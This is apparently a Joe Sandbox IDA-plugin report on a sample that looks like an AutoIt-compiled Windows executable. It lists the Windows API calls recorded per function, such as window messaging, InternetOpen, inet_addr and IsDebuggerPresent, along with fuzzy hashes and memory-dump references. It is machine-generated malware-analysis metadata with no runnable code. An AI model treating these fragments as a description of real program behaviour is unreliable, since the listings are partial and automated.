                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 461e943cf7ef7d931a7f61b9435b3887329da16fcb9f4eaea681e286c2bb3ef8
                                • Instruction ID: 0ba895129088e189d2a1eda0f751398b48591b542c33e8fff0056f7aebf1e679
                                • Opcode Fuzzy Hash: 461e943cf7ef7d931a7f61b9435b3887329da16fcb9f4eaea681e286c2bb3ef8
                                • Instruction Fuzzy Hash: 3611B2717002197FEF159F54DC80EBB37AAEB893A4F110164F95C9B290DA759C918BA0
                                APIs
                                  • Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
                                  • Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
                                  • Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91
                                • GetWindowRect.USER32(00000000,?), ref: 00B26EE0
                                • GetSysColor.USER32(00000012), ref: 00B26EFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                • String ID: static
                                • API String ID: 1983116058-2160076837
                                • Opcode ID: 33f91df88478a214148b9e5d1e919cd3bed7bd1d84b2f50e03a3c90e4f74089c
                                • Instruction ID: 68d162764505a52b69df448b9b33960455fd7895a80f2f37c4979d58a69fd9c9
                                • Opcode Fuzzy Hash: 33f91df88478a214148b9e5d1e919cd3bed7bd1d84b2f50e03a3c90e4f74089c
                                • Instruction Fuzzy Hash: 9F21447261021AAFDB04DFA8DD45AFA7BF8EB08314F104668F959D3250EB34E8619B60
                                APIs
                                • GetWindowTextLengthW.USER32(00000000), ref: 00B26C11
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B26C20
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: LengthMessageSendTextWindow
                                • String ID: edit
                                • API String ID: 2978978980-2167791130
                                • Opcode ID: f531814de7ceac29f3157231b8889f49ff0415f3d17a3ab20b5f7528550ca374
                                • Instruction ID: dce08af34a1f4cf5cd48c070b1884dc3f0f75c29b74a621024b58b0de862981a
                                • Opcode Fuzzy Hash: f531814de7ceac29f3157231b8889f49ff0415f3d17a3ab20b5f7528550ca374
                                • Instruction Fuzzy Hash: AD119D71500118ABEB105E64AC8AEFA37A9EB05378F204764F968D71E0CB75DC919B60
                                APIs
                                • _memset.LIBCMT ref: 00B02F11
                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B02F30
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: be3030fcfe3a845b5b4856954c5beb0692286f06b0755d3c9f1fc2c184a6606d
                                • Instruction ID: 882c4bf19fd1d53434cb86108ab3c8d1b28745d43b91804a39324e235eaff37e
                                • Opcode Fuzzy Hash: be3030fcfe3a845b5b4856954c5beb0692286f06b0755d3c9f1fc2c184a6606d
                                • Instruction Fuzzy Hash: CA119032901115ABDF25DB98DC88BA97BF9EB05350F1440E6FD55A72E0DBB0AD088791
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B12520
                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12549
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Internet$OpenOption
                                • String ID: <local>
                                • API String ID: 942729171-4266983199
                                • Opcode ID: f2767674a817f2820f7c13098b86b036b47ea3fd37d91b5c859205c1c45b9998
                                • Instruction ID: 31f4a17ad73c2f37b63729ab104ba272f793faf9d876589032065b31ec889300
                                • Opcode Fuzzy Hash: f2767674a817f2820f7c13098b86b036b47ea3fd37d91b5c859205c1c45b9998
                                • Instruction Fuzzy Hash: 6311E370100225FADB248F518CD9EFBFFE9FB26351F5081AAF90546140D27059A1D6E0
                                APIs
                                  • Part of subcall function 00B1830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B180C8,?,00000000,?,?), ref: 00B18322
                                • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB
                                • htons.WSOCK32(00000000,?,00000000), ref: 00B18108
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ByteCharMultiWidehtonsinet_addr
                                • String ID: 255.255.255.255
                                • API String ID: 2496851823-2422070025
                                • Opcode ID: 4899d60570429fcc765a57802ace5545cfca25a49499327eecd29d1d440ae4c0
                                • Instruction ID: 3e4bdf0fdf26c4c25992a0c8b363a9f2cebf85732956cdf4f964b92ae449a966
                                • Opcode Fuzzy Hash: 4899d60570429fcc765a57802ace5545cfca25a49499327eecd29d1d440ae4c0
                                • Instruction Fuzzy Hash: 6411E535600209ABCB20AF64CC86FFDB3B4FF08320F108566F911A72D1DB31A855C655
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF9355
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 372448540-1403004172
                                • Opcode ID: 4f1edec8f14c012646c58d696f61c9e35c98227ecda19e33b4be6d5eba05c4b1
                                • Instruction ID: 0fc34776495e2d6c52b850e2080b846caf10341ca49b31f1f4222470b36ddada
                                • Opcode Fuzzy Hash: 4f1edec8f14c012646c58d696f61c9e35c98227ecda19e33b4be6d5eba05c4b1
                                • Instruction Fuzzy Hash: 64019E71A45218AB8B04EBA4CC91DFF77B9BF06360B140759BA725B2D1EF31590CC660
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF924D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 372448540-1403004172
                                • Opcode ID: b86b17328941fcb9d3f7995e0d18603ba67cef8503c550d18eb8e73517475c2f
                                • Instruction ID: dc586636daa61cf0b9ed762579fbab0b8a4a147b01ef00ffa4d65b26c358cf98
                                • Opcode Fuzzy Hash: b86b17328941fcb9d3f7995e0d18603ba67cef8503c550d18eb8e73517475c2f
                                • Instruction Fuzzy Hash: D9018471A41208BBCB15EBE0CA96EFF73A89F16340F140059BA12672D2EF156F1C9671
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                  • Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7
                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF92D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassMessageNameSend_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 372448540-1403004172
                                • Opcode ID: 9c69adf3746a019600328dde3828c591d2fb70c73554281af33dff222194b06d
                                • Instruction ID: cba36e6a028dbd430e7b55f52cfaea16d64f19469a22ca24a40b1126848b5769
                                • Opcode Fuzzy Hash: 9c69adf3746a019600328dde3828c591d2fb70c73554281af33dff222194b06d
                                • Instruction Fuzzy Hash: B5018471A412087BCB05E7E4CA82EFF77A89F15340F1401557952631D1EB115F0C9275
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassName_wcscmp
                                • String ID: #32770
                                • API String ID: 2292705959-463685578
                                • Opcode ID: 84d5134551b3d160f3a722351021a74dc14daa345c28e4d0174a3628de0dfbd8
                                • Instruction ID: dcf02eb9bb628a6fec9e7a10cbd75b37e8c3b33aedff1348b8ac4be40b55a4c5
                                • Opcode Fuzzy Hash: 84d5134551b3d160f3a722351021a74dc14daa345c28e4d0174a3628de0dfbd8
                                • Instruction Fuzzy Hash: 17E02B3290022916D7209A959C05FA7F7ECEB44721F0001AAFD10D3050D96099058BE1
                                APIs
                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AF81CA
                                  • Part of subcall function 00AC3598: _doexit.LIBCMT ref: 00AC35A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Message_doexit
                                • String ID: AutoIt$Error allocating memory.
                                • API String ID: 1993061046-4017498283
                                • Opcode ID: e6ecd27b20630b1e94d77077b18a7698df3bfac3abd509e98119504f85bed741
                                • Instruction ID: 583d42e3c8acc7f871d20a6b2f26f225d8f326470ccad6f6b713dbb0ebafeff0
                                • Opcode Fuzzy Hash: e6ecd27b20630b1e94d77077b18a7698df3bfac3abd509e98119504f85bed741
                                • Instruction Fuzzy Hash: EBD05B323C535C36D62533E86D07FD975888B05B52F504465BF08565D38ED559C242DD
                                APIs
                                  • Part of subcall function 00ADB564: _memset.LIBCMT ref: 00ADB571
                                  • Part of subcall function 00AC0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB540,?,?,?,00AA100A), ref: 00AC0B89
                                • IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB544
                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB553
                                Strings
                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB54E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                • API String ID: 3158253471-631824599
                                • Opcode ID: 940664e8261d2c7e148eaba510b13d081d2df14cce948625f999b18a02133b4b
                                • Instruction ID: b3cd5ee8de342e4fa8e0ced9c46e61f251a9a5ef62c60dc96e6b4bf189e3cf7d
                                • Opcode Fuzzy Hash: 940664e8261d2c7e148eaba510b13d081d2df14cce948625f999b18a02133b4b
                                • Instruction Fuzzy Hash: CBE03970610311CBD320DF28E504B527BE0AB05704F018A6DE457C3360DBB4D505CBA1
                                APIs
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B25BF5
                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B25C08
                                  • Part of subcall function 00B054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FindMessagePostSleepWindow
                                • String ID: Shell_TrayWnd
                                • API String ID: 529655941-2988720461
                                • Opcode ID: 3ae28fa2227848d1cf0272ae57b508ce0c5461cf12a6b4810c86b1f576afee6e
                                • Instruction ID: 3dce062c991b061d4e2debfe6652bc34d9bd7cd859a77d2ef8a1dcbcf4c123de
                                • Opcode Fuzzy Hash: 3ae28fa2227848d1cf0272ae57b508ce0c5461cf12a6b4810c86b1f576afee6e
                                • Instruction Fuzzy Hash: C8D0C931388712BAE774AB70AC4BFE76A64EB11B51F010875BB46AA1E0D9E45842CA50